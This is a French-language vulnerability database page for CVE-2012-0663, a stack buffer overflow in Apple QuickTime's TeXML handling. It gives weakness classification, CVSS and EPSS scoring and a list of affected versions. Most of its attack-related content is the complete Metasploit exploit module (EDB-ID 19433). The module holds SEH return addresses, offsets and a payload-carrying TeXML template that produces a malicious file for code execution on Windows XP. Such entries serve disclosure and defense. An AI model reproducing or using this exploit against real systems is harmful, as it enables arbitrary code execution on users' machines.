Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-119 |
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
9.3 |
|
AV:N/AC:M/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 19433
Date de publication : 2012-06-27 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime TeXML Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in Apple QuickTime. When handling
a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
gain arbitrary code execution under the context of the user. The flaw is
generally known as a bug while processing the 'transform' attribute, however,
that attack vector seems to only cause a TerminateProcess call due to a corrupt
stack cookie, and more data will only trigger a warning about the malformed XML
file. This module exploits the 'color' value instead, which accomplishes the same
thing.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexander Gavrun', # Vulnerability Discovery
'sinn3r', # Metasploit Module
'juan vazquez' # Metasploit Module
],
'References' =>
[
[ 'OSVDB', '81934' ],
[ 'CVE', '2012-0663' ],
[ 'BID', '53571' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-095/' ],
[ 'URL', 'http://support.apple.com/kb/HT1222' ]
],
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00\x23\x25\x3c\x3e\x7d"
},
'Platform' => 'win',
'Targets' =>
[
[ 'QuickTime 7.7.1 on Windows XP SP3',
{
'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42)
'Offset' => 643,
'Max' => 13508
}
],
[ 'QuickTime 7.7.0 on Windows XP SP3',
{
'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34)
'Offset' => 643,
'Max' => 13508
}
],
[ 'QuickTime 7.6.9 on Windows XP SP3',
{
'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9)
'Offset' => 643,
'Max' => 13508
}
],
],
'Privileged' => false,
'DisclosureDate' => 'May 15 2012'))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']),
], self.class)
end
def exploit
my_payload = rand_text(target['Offset'])
my_payload << generate_seh_record(target.ret)
my_payload << payload.encoded
my_payload << rand_text(target['Max'] - my_payload.length)
texml = <<-eos
<?xml version="1.0"?>
<?quicktime type="application/x-quicktime-texml"?>
<text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"
language="eng" timeScale="600"
transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">
<sample duration="2400" keyframe="true">
<description format="tx3g" displayFlags="ScrollIn"
horizontalJustification="Left"
verticalJustification="Top"
backgroundColor="0%, 0%, 0%, 100%">
<defaultTextBox x="0" y="0" width="176" height="60"/>
<fontTable>
<font id="1" name="Times"/>
</fontTable>
<sharedStyles>
<style id="1">
{font-table: 1} {font-size: 10}
{font-style:normal}
{font-weight: normal}
{color: #{my_payload}%, 100%, 100%, 100%}
</style>
</sharedStyles>
</description>
<sampleData scrollDelay="200"
highlightColor="25%, 45%, 65%, 100%"
targetEncoding="utf8">
<textBox x="10" y="10" width="156" height="40"/>
<text styleID="1">What you need... Metasploit!</text>
<highlight startMarker="1" endMarker="2"/>
<blink startMarker="3" endMarker="4"/>
</sampleData>
</sample>
</text3GTrack>
eos
texml = texml.gsub(/^\t\t/,'')
print_status("Creating '#{datastore['FILENAME']}'.")
file_create(texml)
end
end
Products Mentioned
Configuraton 0
Apple>>Quicktime >> Version To (including) 7.7.1
Apple>>Quicktime >> Version 3.0
Apple>>Quicktime >> Version 4.1.2
Apple>>Quicktime >> Version 5.0
Apple>>Quicktime >> Version 5.0.1
Apple>>Quicktime >> Version 5.0.2
Apple>>Quicktime >> Version 6.0
Apple>>Quicktime >> Version 6.0.0
Apple>>Quicktime >> Version 6.0.1
Apple>>Quicktime >> Version 6.0.2
Apple>>Quicktime >> Version 6.1
Apple>>Quicktime >> Version 6.1.0
Apple>>Quicktime >> Version 6.1.1
Apple>>Quicktime >> Version 6.2.0
Apple>>Quicktime >> Version 6.3.0
Apple>>Quicktime >> Version 6.4.0
Apple>>Quicktime >> Version 6.5
Apple>>Quicktime >> Version 6.5.0
Apple>>Quicktime >> Version 6.5.1
Apple>>Quicktime >> Version 6.5.2
Apple>>Quicktime >> Version 7.0
Apple>>Quicktime >> Version 7.0.0
Apple>>Quicktime >> Version 7.0.1
Apple>>Quicktime >> Version 7.0.2
Apple>>Quicktime >> Version 7.0.3
Apple>>Quicktime >> Version 7.0.4
Apple>>Quicktime >> Version 7.1
Apple>>Quicktime >> Version 7.1.0
Apple>>Quicktime >> Version 7.1.1
Apple>>Quicktime >> Version 7.1.2
Apple>>Quicktime >> Version 7.1.3
Apple>>Quicktime >> Version 7.1.4
Apple>>Quicktime >> Version 7.1.5
Apple>>Quicktime >> Version 7.1.6
Apple>>Quicktime >> Version 7.2
Apple>>Quicktime >> Version 7.2.0
Apple>>Quicktime >> Version 7.2.1
Apple>>Quicktime >> Version 7.3
Apple>>Quicktime >> Version 7.3.0
Apple>>Quicktime >> Version 7.3.1
Apple>>Quicktime >> Version 7.3.1.70
Apple>>Quicktime >> Version 7.4
Apple>>Quicktime >> Version 7.4.0
Apple>>Quicktime >> Version 7.4.1
Apple>>Quicktime >> Version 7.4.5
Apple>>Quicktime >> Version 7.5.0
Apple>>Quicktime >> Version 7.5.5
Apple>>Quicktime >> Version 7.6.0
Apple>>Quicktime >> Version 7.6.1
Apple>>Quicktime >> Version 7.6.2
Apple>>Quicktime >> Version 7.6.5
Apple>>Quicktime >> Version 7.6.6
Apple>>Quicktime >> Version 7.6.7
Apple>>Quicktime >> Version 7.6.8
Apple>>Quicktime >> Version 7.6.9
Apple>>Quicktime >> Version 7.7.0
Apple>>Quicktime >> Version 7.60.92.0
Apple>>Quicktime >> Version 7.62.14.0
Apple>>Quicktime >> Version 7.64.17.73
Apple>>Quicktime >> Version 7.65.17.80
Apple>>Quicktime >> Version 7.66.71.0
Apple>>Quicktime >> Version 7.67.75.0
Apple>>Quicktime >> Version 7.68.75.0
Apple>>Quicktime >> Version 7.69.80.9
Microsoft>>Windows >> Version *
Références